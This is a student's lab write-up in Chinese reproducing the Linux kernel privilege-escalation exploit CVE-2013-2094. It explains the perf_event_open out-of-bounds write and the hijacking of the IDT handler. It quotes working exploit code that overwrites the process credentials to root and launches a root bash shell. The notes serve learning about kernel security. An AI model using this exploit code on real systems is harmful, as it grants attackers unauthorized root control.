CVE 2013-2094 exploit 实验笔记

  • 1. links
  • 2. 实验流程
    • 2.1 安装ubuntu64 虚拟机
    • 2.2 编译 2.6.38 内核
    • 2.3 开始exploitation
  • 3. exploitation 分析
    • 3.0 漏洞
    • 3.1 寻找目标
      • 3.1.1 如何利用越界访问
      • 3.1.2 尝试递增IDT table Gate Descriptor
    • 3.2 shellcode

这些是本人在学校的计算机系统课上做的一个exploit的复现实验,由于本人第一次接触计算机安全相关的知识,以下内容仅为本人的实验内容和个人理解。如有错误和不足之处敬请谅解。作者Joe Damato 对此漏洞已经有比较详细的讲解了。本人对于其中不易理解的部分有更进一步的解释。

1. links

2.6.38 内核下载:

Series 2.6.38 : Linux (

ubuntu 10.04 64-bit:

Index of /releases/10.04.0 (

exploit代码:cve-2013-2094/rewritten_semtex.c at master · realtalk/cve-2013-2094 · GitHub

Joe Damato 的 cve介绍原文: A closer look at a recent privilege escalation bug in Linux (CVE-2013-2094) at time to bleed by Joe Damato

看内核源码的网站:kernel 2.6.38

2. 实验流程

2.1 安装ubuntu64 虚拟机

版本:Ubuntu 10.04 64-bit

2.2 编译 2.6.38 内核


2.3 开始exploitation


gcc rewritten_semtex.c -O2 -o re


3. exploitation 分析

3.0 漏洞

CVE 2013-2094 实际上是一个数组越界改写的漏洞。其影响范围为linux kernel 版本 2.6.37 到 3.8.9
在系统调用 “pref_event_open” 中以结构体 “perf_event_attr” 指针作为输入。


struct perf_event_attr {__u32           type;__u32          size;__u64          config;

其中config 为一个无符号64位整数。

接下来该系统调用会依次调用两个函数"pref_swevent_init" 和 “sw_pref_event_destroy”:

其中第一个函数尝试将config输入给event_id, 如果config数值较大会导致even_id整数溢出成为负数,然后永远跳过之后的if语句。最后atomic_inc函数会导致位于pref_swevent_enabled[event_id]这个地址的值递增。 也就是说在pref_swevent_enabled数组基址之前的地址被递增。

第二个函数中evnet_id 为无符号64位类型整数,同时没有进行数组越界的检测。同样如果config的数值过大,会导致数组越界。在atomic_dec 函数中会尝试递减数组范围外的地址。

3.1 寻找目标

3.1.1 如何利用越界访问

我们可以尝试以0x0000 0000 ffff ffff 作为系统调用中config的输入。在第一个函数中event_id 会被赋值为0xffff ffff 也就是-1, 导致pref_swevent_enabled数组基址的前一位地址被递增。

同时在第二个函数中,event_id 会被赋值为0x0000 0000 ffff ffff 十进制为‭ 4294967295‬, 导致数组越界访问。
我们知道虚拟地址中内核部分为0xffff ffff 8000 00000xffff ffff ffff ffff 根据上图中的计算。atomic_dec 函数最终会导致用户空间从0x4 0000 00000x3 8000 0000的部分被递减。

举一个例子如果pref_swevent_enabled数组的基址为0xffff ffff 81c4 3d60, 根据计算递减会发生在0x3 8000 00000x3 9000 0000 之间

我们可以生成一个memory map 地址为 0x3 8000 00000x3 9000 0000 之间然后全部设值为0. 等系统调用之后根据值的变化来决定递减发生的位置。

同样在这个例子中递减会发生于 0x0000 0003 81c4 3d5c 其中offset 为 0x1c43d5c 通过offset我们便可以计算出pref_swevent_enabled数组的基址 0xffff ffff 8000 0000 + offset + 4= 0xffff ffff 81c4 3d60


3.1.2 尝试递增IDT table Gate Descriptor

Intel® 64 and IA-32 Architectures Developer’s Manual: Vol. 3A
简单来说就是对于每一个Interrupt number 都有一个叫 IDT table Gate Descriptor 的数据结构来储存其相关信息,其中包括中断处理函数的虚拟地址。

如上图所示在64位的 IDT Gate Descriptor 中 offset 63…32 中既阴影部分,存储着中断处理函数的上32位。因为该函数位于内核空间,所以上32位的值为0xffff ffff 。 如果我们可以将这个值递增,该值溢出变为0, 此时中断处理函数地址会变为用户空间中,我们就可以创建memory map 来注入shellcode。

IDT Gate Descriptor table 是一个数组,它依次存储每个Interrupt number的IDT Gate Descriptor。这个IDT Gate Descriptor table 的基地址位于pref_swevent_enabled数组基址的前面。并且该地址可以在用户态以命令asm volatile ("sidt %0" : "=m" (idt)); 得到。此时我们同时知道了IDT Gate Descriptor table 和pref_swevent_enabled数组的基址。以IDT Gate Descriptor table基地址减去pref_swevent_enabled数组的基址得到一个负数,将其转化为无符号整数之后除以4(因为pref_swevent_enabled 为int类型的数组占4个字节)也就是图中的 offset/4 将该值作为系统调用的输入的话,会导致IDT Gate Descriptor table基地址处被递增。由于我们这次想改变Interrupt 4 的中断处理函数地址,所以还要加上一个0x48/4.

我们mask掉IDT Gate Descriptor table基地址的上32位和下24位,以此为基地址创建一个 0x002000000 大小的memory map。被改变的中断处理函数的地址会位于这个map中。



3.2 shellcode



static void fix_idt_and_overwrite_creds() {int i, j, k;/* create a few markers which will be filled in with the* ((group id << 32) | user id) later by the exploit.*/uint64_t uids[4] = { GENERATE_MARKER(2),GENERATE_MARKER(3),GENERATE_MARKER(4),GENERATE_MARKER(5)};/* kernel stacks are usually 8192 bytes on Linux. thus, we can take the* address of a stack allocated variable and mask off a few bits to find* what is the base of the kernel stack where the thread_info struct lives.*//* current is (hopefully) pointing at the start of thread_info which contains* the current task_struct pointer.*/uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));/* the task_struct is allocated in kernel memory. grab the top 28 bits to use* as an estimate to determine if other addresses are kernel addresses* (see below).*/uint64_t kbase = ((uint64_t)current)>>36;/* This marker will eventually be replaced by the address of the upper 32-bits* of the IDT handler address we are overwiting.** Thus, the write on the following line to -1 will restore the original value* of the IDT entry which we will overwrite */uint32_t *fixptr = (void*) GENERATE_MARKER(1);*fixptr = -1;/* this for loop will search through a lot of RAM to try to locate the* credentials structure in memory and overwrite the various uids/gids* and capabilities structures.*/for (i=0; i<4000; i+=4) {/* hopefully, p is pointing at part of the current task's task_struct */uint64_t *p = (void *) &current[i];/* t is pointing at the start of the memory region p points to, which * (hopefully) is the real_creds struct in our process' task_struct** if it isn't, this outer loop continues, hopefully moving p closer to* what we are searching for.*/uint32_t *t = (void *) p[0];/* this if statement checks to see if we have found the pointer to* the credentials structure "real_cred".** to do this, the exploit checks two conditions:*   1.) p[0] != p[1] -- our process' real_cred pointer should be the same*                       as the cred pointer if we have found our process'*              task struct.**   2.) (p[0] >> 36 != kbase) -- our process' real_cred pointer must be*                                in kernel memory, somewhere if this check*                      fails, we probably found something that*                    isn't actually the real_creds pointer, but*                    is some other thing in task_struct*/if ((p[0] != p[1]) || ((p[0]>>36) != kbase))continue;/* at this point, we believe that p[0] is a pointer to real_creds, and so* t is pointing to real_creds.** we need to scan across a bunch of bytes because struct cred* has a few fields before the UID/GID field.*/for (j=0; j<20; j++) {/* there are 8 32-bit uid / gid fields that we will check* to ensure they match our process' uid / gid*/for (k = 0; k < 8; k++) {if (((uint32_t*)uids)[k] != t[j+k]) {goto next;}}/* if we've made it here, t[j] is the first 32-bit uid field* in struct cred.** this loop sets all 8 uid/gid fields to 0 (root)*/for (i = 0; i < 8; i++) {t[j+i] = 0;}/* this field sets the capability sets to -1, which enables* all capabilities (and overwrites some other fields after the * capability sets).*/for (i = 0; i < 10; i++) {t[j+9+i] = -1;}return;
next:;    }}

其中 GENERATE_MARKER 为一个宏,用于生成一串独一无二的字符串

#define GENERATE_MARKER(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

貌似在O2优化下,这些maker会和代码保存到同一区域,在exploit程序运行期间使用memmem指令找到地址,并且将其改成想要的值(8个uid和gid的值和被改变的idt table的地址)。

 for (j = 5; j > 0; j--) {/* generate marker values */needle = GENERATE_MARKER(j);/* find marker values in the malicious code copied to our memory* region*/p = memmem(code, 1024, &needle, 8);if (!p) {fprintf(stderr, "couldn't find the marker values (this is""bad)\n");break;}if (j > 1) {/* marker values [2 - 5] will be replaced with the* uid/gid of this process.*/*p = ((g << 32) | u);} else {/* marker value 1 will be replaced with the offset of* the IDT handler we will highjack. this address will* be used to restore the overwritten state later.*/*p = idt.addr + 0x48;}}

被改变uid/gid的进程可以运行root shell。

 if (setuid(0) != 0) {perror("setuid");exit(EXIT_FAILURE);}/** launch bash as uid 0*/return execl("/bin/bash", "-sh", NULL);

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